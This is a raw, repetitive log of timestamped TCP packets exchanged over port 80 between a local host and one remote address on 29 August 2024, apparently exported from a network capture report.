                                  Aug 29, 2024 23:42:07.841748953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841749907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841764927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841769934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841777086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841789961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841804028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841804028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841816902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841828108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841833115 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841841936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841856003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841877937 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841914892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.841963053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841974974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841985941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.841995955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.842016935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.842052937 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927469969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927730083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927746058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927756071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927761078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927767992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927781105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927792072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927802086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927810907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927813053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927826881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927843094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927855015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927855968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927866936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927874088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927881002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927892923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927900076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927906036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927916050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927918911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927933931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927937031 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927947998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927961111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927962065 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.927977085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927989006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927999973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.927999973 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928013086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928028107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928037882 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928067923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928088903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928100109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928109884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928121090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928133965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928137064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928145885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928165913 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928175926 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928200960 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928234100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928296089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928307056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928318024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928339005 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928364038 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928445101 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928457022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928467035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928500891 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928523064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928531885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928544044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928554058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928565979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928582907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928585052 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928597927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928608894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928611040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928622007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928631067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928633928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928651094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928675890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928682089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928694010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928704977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928718090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928730011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928731918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928741932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928747892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928755999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928767920 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928793907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928930998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928944111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928955078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.928981066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.928992033 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929055929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929068089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929078102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929083109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929089069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929094076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929105997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929116011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929208994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929224968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929238081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929291010 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929327011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929339886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929351091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929353952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929366112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929377079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929384947 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929388046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929402113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929411888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929413080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929425955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929439068 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929457903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929466009 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929617882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929630041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929645061 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929651976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929662943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929675102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929682016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929691076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929713011 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929723978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929830074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929841042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929851055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929868937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929879904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929884911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929892063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929903984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929908037 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929914951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929924965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.929927111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929950953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.929976940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930082083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930094004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930104017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930115938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930126905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930130959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930140972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930149078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930152893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930171967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930208921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930234909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930247068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930257082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930267096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930278063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930283070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930309057 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930320024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930361032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930376053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930386066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930398941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930409908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930413961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930422068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930433989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930443048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930454016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930459023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.930471897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.930485010 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.108022928 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.108031988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.108050108 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.108074903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.193248034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.193397045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.193412066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.193423986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.193434000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.193445921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.193456888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.193455935 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.193485975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.193485975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.193500042 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.193825006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.193871021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.193898916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.193912029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.193942070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194037914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194048882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194057941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194068909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194080114 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194092035 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194108963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194313049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194324017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194333076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194343090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194355965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194356918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194374084 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194382906 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194387913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194396973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194401979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194408894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194421053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194431067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194434881 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194442034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194454908 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194468975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194480896 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194510937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194520950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194530010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194540977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194556952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194557905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194567919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194571018 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194580078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194581985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194591999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194602966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194605112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194614887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194628000 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194634914 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194642067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194647074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194653988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194664001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194674969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194684029 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194705009 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194714069 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194787979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194797993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194806099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194817066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194827080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194829941 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194838047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194849014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194849014 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194849014 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194859028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194871902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194876909 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194890022 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194915056 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.194933891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.194999933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195010900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195020914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195031881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195048094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195058107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195075989 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195137024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195147991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195157051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195168018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195178032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195179939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195187092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195209980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195219994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195235968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195246935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195255995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195267916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195276976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195280075 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195288897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195297956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195305109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195306063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195317030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.195332050 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195348978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.195357084 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196088076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196101904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196111917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196142912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196150064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196154118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196160078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196166039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196177006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196178913 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196196079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196208954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196316957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196326971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196335077 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196345091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196356058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196362972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196369886 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196372986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196377993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196384907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196396112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196398973 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196408033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196422100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196438074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196460009 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.196640968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196650982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196660042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196670055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.196681023 CEST8049730172.67.128.117192.168.2.4
